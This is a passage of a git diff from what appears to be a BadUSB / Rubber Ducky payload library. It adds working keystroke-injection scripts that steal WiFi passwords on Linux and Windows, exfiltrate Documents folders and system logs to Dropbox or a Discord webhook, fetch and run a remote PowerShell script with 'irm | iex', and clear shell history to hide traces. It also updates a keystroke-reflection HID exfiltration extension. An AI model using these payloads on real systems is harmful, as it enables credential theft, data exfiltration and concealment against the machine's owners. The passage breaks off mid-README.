- REM TRANSLATE_INT() - REM REM the above code will inject 1234 + USAGE: + set $INPUT to desired var + call the correct translate_ function for the expected data type e.g. + VAR $myVar = 1234 + $INPUT = $myVar + TRANSLATE_INT() + REM the above code will inject 1234 + END_REM - REM begin extension variables - DEFINE PRINT_INT 0 - DEFINE PRINT_HEX 1 - VAR $DIGIT_PRINT_MODE = PRINT_INT + REM CONFIGURATION: + DEFINE #INCLUDE_TRANSLATE_HEX FALSE + DEFINE #INCLUDE_TRANSLATE_BOOL FALSE + DEFINE #INCLUDE_TRANSLATE_BINARY FALSE + DEFINE #INCLUDE_SWAP_ENDIAN FALSE + + REM Append ENTER after translation + VAR $AS_STRINGLN = TRUE + + DEFINE #PRINT_INT 0 + DEFINE #PRINT_HEX 1 + VAR $DIGIT_PRINT_MODE = #PRINT_INT VAR $D = 0 VAR $IN = 0 VAR $INPUT = 0 VAR $MOD = 0 VAR $P = FALSE - VAR $NL = TRUE - REM end extension variables REM REQUIRED for INT/HEX - convert int to char FUNCTION PRINTDIGIT() @@ -59,20 +70,22 @@ EXTENSION TRANSLATE STRING 8 ELSE IF ($D == 9) THEN STRING 9 - ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN - IF ($D == 10) THEN - STRING A - ELSE IF ($D == 11) THEN - STRING B - ELSE IF ($D == 12) THEN - STRING C - ELSE IF ($D == 13) THEN - STRING D - ELSE IF ($D == 14) THEN - STRING E - ELSE IF ($D == 15) THEN - STRING F - END_IF + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX + ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN + IF ($D == 10) THEN + STRING A + ELSE IF ($D == 11) THEN + STRING B + ELSE IF ($D == 12) THEN + STRING C + ELSE IF ($D == 13) THEN + STRING D + ELSE IF ($D == 14) THEN + STRING E + ELSE IF ($D == 15) THEN + STRING F + END_IF + END_IF_DEFINED ELSE STRING ? END_IF @@ -91,15 +104,18 @@ EXTENSION TRANSLATE END_IF END_FUNCTION - REM ENDIAN SWAPPER helper, (useful for working with VID/PID) - FUNCTION SWAP_ENDIAN() - $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00)) - END_FUNCTION + IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN + REM ENDIAN SWAPPER helper, (useful for working with VID/PID) + FUNCTION SWAP_ENDIAN() + $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00)) + END_FUNCTION + END_IF_DEFINED + REM Translates a variable of presumed integer type and attempts to convert REM and inject a DECIMAL string representation FUNCTION TRANSLATE_INT() - $DIGIT_PRINT_MODE = PRINT_INT + $DIGIT_PRINT_MODE = #PRINT_INT $P = FALSE IF ( $INPUT >= 10000) THEN $MOD = 10000 @@ -119,99 +135,108 @@ EXTENSION TRANSLATE END_IF() $D = $INPUT PRINTDIGIT() - IF $NL THEN + IF $AS_STRINGLN THEN ENTER END_IF END_FUNCTION REM Translates a variable of presumed boolean type and attempts to convert REM and inject a BOOLEAN string representation - FUNCTION TRANSLATE_BOOL() - IF $INPUT THEN - STRING TRUE - ELSE - STRING FALSE - END_IF - IF $NL THEN - ENTER - END_IF - END_FUNCTION + REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL + FUNCTION TRANSLATE_BOOL() + IF $INPUT THEN + STRING TRUE + ELSE + STRING FALSE + END_IF + IF $AS_STRINGLN THEN + ENTER + END_IF + END_FUNCTION + END_IF_DEFINED REM Translates a variable of presumed integer type and attempts to convert REM and inject a HEX string representation - FUNCTION TRANSLATE_HEX() - $DIGIT_PRINT_MODE = PRINT_HEX - VAR $chars = 0 - VAR $d1 = 0 - VAR $d2 = 0 - VAR $d3 = 0 - VAR $d4 = 0 - WHILE ($INPUT > 0) + REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX + FUNCTION TRANSLATE_HEX() + $DIGIT_PRINT_MODE = #PRINT_HEX + VAR $chars = 0 + VAR $d1 = 0 + VAR $d2 = 0 + VAR $d3 = 0 + VAR $d4 = 0 + WHILE ($INPUT > 0) + IF ($chars == 0) THEN + $d1 = ($INPUT % 16) + ELSE IF ($chars == 1) THEN + $d2 = ($INPUT % 16) + ELSE IF ($chars == 2) THEN + $d3 = ($INPUT % 16) + ELSE IF ($chars == 3) THEN + $d4 = ($INPUT % 16) + END_IF + $chars = ($chars + 1) + $INPUT = ($INPUT / 16) + END_WHILE + VAR $i = 0 + STRING 0x IF ($chars == 0) THEN - $d1 = ($INPUT % 16) + STRING 0x0000 ELSE IF ($chars == 1) THEN - $d2 = ($INPUT % 16) + STRING 000 + $D = $d1 + PRINTDIGIT() ELSE IF ($chars == 2) THEN - $d3 = ($INPUT % 16) + STRING 00 + $D = $d2 + PRINTDIGIT() + $D = $d1 + PRINTDIGIT() ELSE IF ($chars == 3) THEN - $d4 = ($INPUT % 16) + STRING 0 + $D = $d3 + PRINTDIGIT() + $D = $d2 + PRINTDIGIT() + $D = $d1 + PRINTDIGIT() + ELSE IF ($chars == 4) THEN + STRING 0 + $D = $d4 + PRINTDIGIT() + $D = $d3 + PRINTDIGIT() + $D = $d2 + PRINTDIGIT() + $D = $d1 + PRINTDIGIT() END_IF - $chars = ($chars + 1) - $INPUT = ($INPUT / 16) - END_WHILE - VAR $i = 0 - STRING 0x - IF ($chars == 0) THEN - STRING 0x0000 - ELSE IF ($chars == 1) THEN - STRING 000 - $D = $d1 - PRINTDIGIT() - ELSE IF ($chars == 2) THEN - STRING 00 - $D = $d2 - PRINTDIGIT() - $D = $d1 - PRINTDIGIT() - ELSE IF ($chars == 3) THEN - STRING 0 - $D = $d3 - PRINTDIGIT() - $D = $d2 - PRINTDIGIT() - $D = $d1 - PRINTDIGIT() - ELSE IF ($chars == 4) THEN - STRING 0 - $D = $d4 - PRINTDIGIT() - $D = $d3 - PRINTDIGIT() - $D = $d2 - PRINTDIGIT() - $D = $d1 - PRINTDIGIT() - END_IF - IF $NL THEN - ENTER - END_IF - END_FUNCTION + IF $AS_STRINGLN THEN + ENTER + END_IF + END_FUNCTION + END_IF_DEFINED REM Translates a variable of presumed integer type and attempts to convert REM and inject a BINARY string representation - FUNCTION TRANSLATE_BINARY() - VAR $I = 16 - WHILE ( $I > 0 ) - $I = ($I - 1) - IF (($INPUT & 0x8000) == 0 ) THEN - STRING 0 - ELSE - STRING 1 + REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY + FUNCTION TRANSLATE_BINARY() + VAR $I = 16 + WHILE ( $I > 0 ) + $I = ($I - 1) + IF (($INPUT & 0x8000) == 0 ) THEN + STRING 0 + ELSE + STRING 1 + END_IF + $INPUT = ($INPUT << 1) + END_WHILE + IF $AS_STRINGLN THEN + ENTER END_IF - $INPUT = ($INPUT << 1) - END_WHILE - IF $NL THEN - ENTER - END_IF - END_FUNCTION + END_FUNCTION + END_IF_DEFINED END_EXTENSION diff --git a/payloads/extensions/windows_hid_exfil.txt b/payloads/extensions/windows_hid_exfil.txt index d382380..c9ae11c 100644 --- a/payloads/extensions/windows_hid_exfil.txt +++ b/payloads/extensions/windows_hid_exfil.txt @@ -1,51 +1,91 @@ EXTENSION WINDOWS_HID_EXFIL - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM Helpers for Keystroke Reflection data exfiltration - REM This payload is a proof of concept for USB HID only Data Exfiltration + REM_BLOCK DOCUMENTATION + Helpers for Keystroke Reflection data exfiltration + This payload is a proof of concept for USB HID only Data Exfiltration - REM TARGET: - REM Windows Hostthat supports powershell and SendKeys + TARGET: + Windows Host that supports powershell and SendKeys - REM USAGE: - REM Uncomment the function call below to run this extension inline - REM or call RUN_EXFIL() anywhere in your payload after the extension + USAGE: + Prepare data to exfil (in filename defined by TARGET_FILE below) + with a powershell window already open - call RUN_WINDOWS_EXFIL() - REM DEPLOYMENT: - REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. + DEPLOYMENT: + Plug Ducky into host, wait for the LED to turn (and stay) solid green. + END_REM REM CONFIGURATION: - REM File on host machine to exfil using Keystroke Reflection attack - DEFINE TARGET_FILE filename.txt + REM File on host machine to exfil + DEFINE #TARGET_FILE filename.txt + + DEFINE #SAVE_AND_RESTORE_LOCKS TRUE + DEFINE #ENABLE_EXFIL_LEDS TRUE + DEFINE #CLOSE_AFTER_EXFIL TRUE + + DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE + FUNCTION RUN_WINDOWS_EXFIL() - REM Boot - LED_OFF - DELAY 500 - REM Launch Windows RUN dialog - GUI r - DELAY 50 - REM Launch powershell - STRING powershell - ENTER - DELAY 250 - REM Save HOSTs current lock state - SAVE_HOST_KEYBOARD_LOCK_STATE - REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + SAVE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED + + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + LED_OFF + $_EXFIL_LEDS_ENABLED = TRUE + END_IF_DEFINED + $_EXFIL_MODE_ENABLED = TRUE - $_EXFIL_LEDS_ENABLED = TRUE - REM Convert and reflect target file - STRING foreach($b in $(Get-Content "TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit; + STRING_POWERSHELL + foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){ + foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){ + If($b -band $a){ + $o+="%{NUMLOCK}" + }Else{ + $o+="%{CAPSLOCK}" + } + } + }; + $o+="%{SCROLLLOCK}"; + Add-Type -Assembly System.Windows.Forms; + [System.Windows.Forms.SendKeys]::SendWait("$o"); + exit; + END_STRING + IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL + STRING exit; + END_IF_DEFINED + ENTER + REM Listen for EOF WAIT_FOR_SCROLL_CHANGE - REM Indicate SUCCESS on Device LED, Disable EXFIL mode - LED_G $_EXFIL_MODE_ENABLED = FALSE - REM Restore HOSTs lock state to original - RESTORE_HOST_KEYBOARD_LOCK_STATE + + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + LED_G + END_IF_DEFINED + + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + RESTORE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED END_FUNCTION - REM Uncomment the function call below to run this extension inline (here) - REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension - REM RUN_WINDOWS_EXFIL() + IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO + REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template. + REM DEMO Boot Delay + DELAY 3000 + REM Open run dialog + GUI r + DELAY 500 + REM Open Powershell + STRINGLN powershell + DELAY 500 + REM Prepare some data in TARGET_FILE + STRINGLN echo test123 > #TARGET_FILE + DELAY 500 + REM Exfil data to USB Rubber Ducky using Keystroke Reflection + RUN_WINDOWS_EXFIL() + END_IF_DEFINED END_EXTENSION diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md new file mode 100644 index 0000000..18db31d --- /dev/null +++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md @@ -0,0 +1,29 @@ + +# Exfiltrate WiFi Passwords - Linux ✅ + +A script used to exfiltrate the wifi passwords on a Linux machine. + +**Category**: Exfiltrate, Credentials, Execution + +## Description + +A script used to exfiltrate the wifi passwords on a Linux machine. + +Opens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces. + +## Getting Started + +### Dependencies + +* Internet Connection +* Dropbox Token +* Permissions + +### Executing program + +* Plug in your device + +### Settings + +* Set the Dropbox token +* Set the sudo password \ No newline at end of file diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt new file mode 100644 index 0000000..bb5b1b6 --- /dev/null +++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt @@ -0,0 +1,128 @@ + +REM ####################################################### +REM # | +REM # Title : Exfiltrate Wifi Passwords - Linux | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Credentials, Execution | +REM # Target : Linux | +REM # | +REM ####################################################### + +REM Requirements: +REM - Permissions +REM - Internet connection +REM - Dropbox Token + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### PREREQUISITES SECTION #### + + +REM Required: You need to know the sudo password and replace 'example' with this +DEFINE SUDO_PASS example +STRING sudo su +ENTER + +DELAY 1000 +STRING SUDO_PASS +ENTER + +DELAY 2000 +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + + +REM #### ZIP SECTION #### + + +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +DELAY 500 +STRING ZIP_NAME="$RANDOM.zip" +ENTER + +DELAY 500 +STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX) +ENTER + +DELAY 500 +STRING ZIP_PATH="/home/$ZIP_NAME" +ENTER + + +REM #### WiFi && ZIP SECTION #### + + +REM Get all WiFi data +STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do +ENTER +DELAY 500 +STRING nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" - +ENTER +DELAY 500 +STRING nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" - +ENTER +DELAY 500 +STRING done +ENTER +DELAY 500 +REM Wifi exfiltration command time - It depends +DELAY 1000 + +STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" +REM Zip operation time - It depends +DELAY 3000 + + +REM #### EXFILTRATE SECTION #### + + +REM Set yout Dropbox folder name +DEFINE DROPBOX_FOLDER_NAME example +STRING DROPBOX_FOLDER="/ +ENTER +STRING DROPBOX_FOLDER_NAME +ENTER +STRING " +ENTER +DELAY 500 + +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + + +REM #### REMOVE TRACES #### + + +DELAY 2000 +STRING history -c +ENTER + +DELAY 500 +STRING rm -rf "$TMP_FOLDER_PATH" +ENTER + +DELAY 500 +STRING rm -rf "$ZIP_PATH" +ENTER + +DELAY 500 +STRING exit +ENTER + +DELAY 500 +STRING exit +ENTER diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/script.sh b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/script.sh new file mode 100755 index 0000000..3a733f3 --- /dev/null +++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/script.sh @@ -0,0 +1,6 @@ +#!/bin/bash + +for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do + nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" - + nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" - +done diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/README.md b/payloads/library/credentials/WLAN-Windows-Passwords/README.md new file mode 100644 index 0000000..095a5a2 --- /dev/null +++ b/payloads/library/credentials/WLAN-Windows-Passwords/README.md @@ -0,0 +1,26 @@ +# WLAN Windows Password - BADUSB ✅ + +A script used to stole target WLAN Passwords. + +**Category**: WLAN, Credentials + +## Description + +A script used to stole target WLAN Passwords. + +Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. + +Then it cleans up traces of what you have done after. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke 2 netsh commands +* Invoke-WebRequest will be entered in the Run Box to send the content diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1 b/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1 new file mode 100644 index 0000000..d2edacf --- /dev/null +++ b/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1 @@ -0,0 +1,16 @@ + +# ENG +netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object { + $wlan = $_.Matches.Value + $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+' + + $Body = @{ + 'username' = $env:username + " | " + [string]$wlan + 'content' = [string]$passw + } + + Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json) +} + +# Clear the PowerShell command history +Clear-History diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt new file mode 100644 index 0000000..379fe45 --- /dev/null +++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt @@ -0,0 +1,25 @@ +REM ################################################################### +REM # | +REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration | +REM # Author : Aleff | +REM # Description: A script used to stole target WLAN Passwords. | +REM # Category : Credentials | +REM # Target : Windows 10-11 | +REM # Version : 1.0 | +REM # | +REM ################################################################### + + + +DELAY 2000 +GUI r +DELAY 250 +STRING powershell -w h -ep bypass $discord=' + +REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// +DEFINE DISCORD example.com +STRING DISCORD + +REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1 +DEFINE PAYLOAD example.com +STRINGLN ';irm PAYLOAD | iex diff --git a/payloads/library/execution/ChangeMacAddress_Linux/README.md b/payloads/library/execution/ChangeMacAddress_Linux/README.md new file mode 100644 index 0000000..8567288 --- /dev/null +++ b/payloads/library/execution/ChangeMacAddress_Linux/README.md @@ -0,0 +1,28 @@ + +# Change MAC Address + +A script used to change the MAC address on a Linux machine. + +**Category**: Execution + +## Description + +A script used to change the MAC address on a Linux machine. + +Opens a shell, get the network card name, set the new MAC address, erase traces. + +## Getting Started + +### Dependencies + +* Linux Permissions +* Internet Connection + +### Executing program + +* Plug in your device + +### Settings + +* Set the sudo password +* Change as you want the new MAC address \ No newline at end of file diff --git a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt new file mode 100644 index 0000000..e0c538f --- /dev/null +++ b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt @@ -0,0 +1,73 @@ + +REM ########################################### +REM # | +REM # Title : Change Linux MAC Address | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execution | +REM # Target : Linux | +REM # | +REM ########################################### + +REM Requirements: +REM - Permissions + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### PERMISSIONS SECTION #### + + +REM You need to know the sudo password and replace 'example' with this +DEFINE SUDO_PASS example + +STRING sudo su +ENTER +DELAY 1000 +STRING SUDO_PASS +ENTER +DELAY 1000 + + +REM #### MAC SECTION #### + + +REM net-tools command +STRING apt install net-tools +ENTER +DELAY 2000 + +REM Set here your preferred MAC, you can don't change it remaining with the default value +DEFINE NEW_MAC FF:FF:FF:FF:FF:FF + +REM Get the net interface name +STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}') +ENTER +DELAY 500 + +STRING ifconfig $INTERFACE down +ENTER +DELAY 500 + +STRING ifconfig $INTERFACE hw ether +STRING NEW_MAC +ENTER +DELAY 500 + +STRING ifconfig $INTERFACE up +ENTER +DELAY 500 + + +REM #### REMOVE TRACES #### + + +DELAY 2000 +STRING history -c +ENTER + +REM Close shell +STRING exit +ENTER diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md b/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md new file mode 100644 index 0000000..9fb6564 --- /dev/null +++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md @@ -0,0 +1,27 @@ + +# Change Network Configuration + +A script used to change the network configuration on a Linux machine. + +**Category**: Execution + +## Description + +A script used to change the network configuration on a Linux machine. + +Opens a shel, get the network card name, set the network configuration, erase traces. + +## Getting Started + +### Dependencies + +* Linux Permissions + +### Executing program + +* Plug in your device + +### Settings + +* Set the sudo password +* Change as you want the network configuration \ No newline at end of file diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt new file mode 100644 index 0000000..af732aa --- /dev/null +++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt @@ -0,0 +1,81 @@ + +REM ############################################### +REM # | +REM # Title : Change Network Configuration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execution | +REM # Target : Linux | +REM # | +REM ############################################### + +REM Requirements: +REM - Permissions + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### PERMISSIONS SECTION #### + + +REM Required: You need to know the sudo password and replace 'example' with this +DEFINE SUDO_PASS example +STRING sudo su +ENTER + +DELAY 1000 +STRING SUDO_PASS +ENTER +DELAY 1000 + + +REM #### IP SECTION #### + + +REM net-tools command +STRING apt install net-tools +ENTER +DELAY 2000 + +REM Set network interface +DEFINE IP 192.168.1.100 +DEFINE MASK 255.255.255.0 +DEFINE GATEWAY 192.168.1.1 + +STRING IP=" +STRING IP +STRING " +ENTER +DELAY 500 +STRING MASK=" +STRING MASK +STRING " +ENTER +DELAY 500 +STRING GATEWAY=" +STRING GATEWAY +STRING " +ENTER +DELAY 500 + +REM Get the net interface name +STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}') +ENTER +DELAY 500 +STRING ifconfig $INTERFACE $IP netmask $MASK up +ENTER +DELAY 500 + + +REM #### REMOVE TRACES #### + + +STRING history -c +ENTER +DELAY 500 + +REM Close shell +STRING exit +ENTER diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md new file mode 100644 index 0000000..2d8078a --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md @@ -0,0 +1,32 @@ +# Exfiltrate Linux Content With Dropbox - BADUSB ✅ + +A script used to take folder content on Linux Systems. + +**Category**: Exfiltration, Execution + +[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) + +## Description + +A script used to take folder content on Linux Systems. + +Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history. + +## Getting Started + +### Dependencies + +* Internet Connection +* Linux System +* * Terminal that can be opened by the shortcommand CTRL-ALT t +* DropBox Account for the access token + +### Executing program + +* Plug in your device + +### Settings + +* Set your dropbox access token +* Set the folder path interessed (i.e. /Documents) +* Change (if you think that it is necessary) the delay of the zipping operation diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt new file mode 100644 index 0000000..3f9524b --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt @@ -0,0 +1,82 @@ +REM ########################################################## +REM # | +REM # Title : Exfiltrate Linux Content With Dropbox | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Execution | +REM # Target : Linux | +REM # | +REM ########################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + + +DELAY 1000 +CTRL-ALT t + +DELAY 2000 +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + +DELAY 500 +STRING USER_NAME=$(whoami) +ENTER + +DELAY 500 +STRING path="/home/$USER_NAME/Documents" +ENTER + +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +DELAY 500 +STRING NAME="$RANDOM.zip" +ENTER + +DELAY 500 +STRING ZIP_PATH="$path/$NAME" +ENTER + +DELAY 500 +REM The FOLDER that you want to zip, in this example you want to zip all Documents content +STRING FOLDER="/home/$USER_NAME/Documents/" +ENTER + +REM Delay for zipping operation, it depends by computer power and folder directory +DELAY 10000 + +DELAY 500 +STRING if [ -r "$FOLDER" ]; then +ENTER +STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1 +ENTER +STRING else +ENTER +STRING echo "" +ENTER +STRING fi +ENTER + +DELAY 500 +STRING DROPBOX_FOLDER="/$NAME" +ENTER + + +DELAY 500 +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + +DELAY 2000 +STRING history -c +ENTER diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md new file mode 100644 index 0000000..1ea1e56 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md @@ -0,0 +1,33 @@ + +# Exfiltrate Linux Log Files - BADUSB ✅ + +A script used to take linux logs. + +**Category**: Exfiltration, Execution + +[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) + +## Description + +A script used to take linux logs. + +Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder. + +## Getting Started + +### Dependencies + +* Internet Connection +* Linux System +* * Terminal that can be opened by the shortcommand CTRL-ALT t +* DropBox Account for the access token + +### Executing program + +* Plug in your device + +### Settings + +* Set your dropbox access token +* Change if needed the folder path interessed (i.e. /var/log) +* Change (if you think that it is necessary) the delay of the zipping operation diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt new file mode 100644 index 0000000..dbd546f --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt @@ -0,0 +1,80 @@ +REM ###################################################### +REM # | +REM # Title : Exfiltrate Linux Logs With Dropbox | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Execution | +REM # Target : Linux | +REM # | +REM ###################################################### + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + + +DELAY 1000 +CTRL-ALT t + +REM Required: Set here your Dropbox access TOKEN +DELAY 2000 +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + + +DELAY 500 +STRING USER_NAME=$(whoami) +ENTER + +REM Create random num +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +REM Folder path +DELAY 500 +STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX) +ENTER + +REM Zip path +DELAY 500 +STRING ZIP_NAME="$RANDOM.zip" +ENTER +DELAY 500 +STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME" +ENTER + +REM Default log path +DELAY 500 +STRING LOG_PATH="/var/log/" +ENTER + +DELAY 500 +STRING zip -r "$ZIP_PATH" "$LOG_PATH" +ENTER + +REM Delay of zipping operation - it depends +DELAY 10000 + +DELAY 500 +STRING DROPBOX_FOLDER="/$ZIP_NAME" +ENTER + +REM Send to Dropbox function +DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload +DELAY 500 +STRING curl -X POST +STRING DROPBOX_API_LINK +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + +REM Send timing - it depends +DELAY 5000 + +DELAY 500 +STRING rm -rf "$TMP_FOLDER_PATH" +ENTER diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md new file mode 100644 index 0000000..db8dadb --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md @@ -0,0 +1,27 @@ + +# Exfiltrate Network Configuration - Linux ✅ + +A script used to exfiltrate the network configuration on a Linux machine. + +**Category**: Exfiltrate, Execution + +## Description + +A script used to exfiltrate the network configuration on a Linux machine. + +Opens a 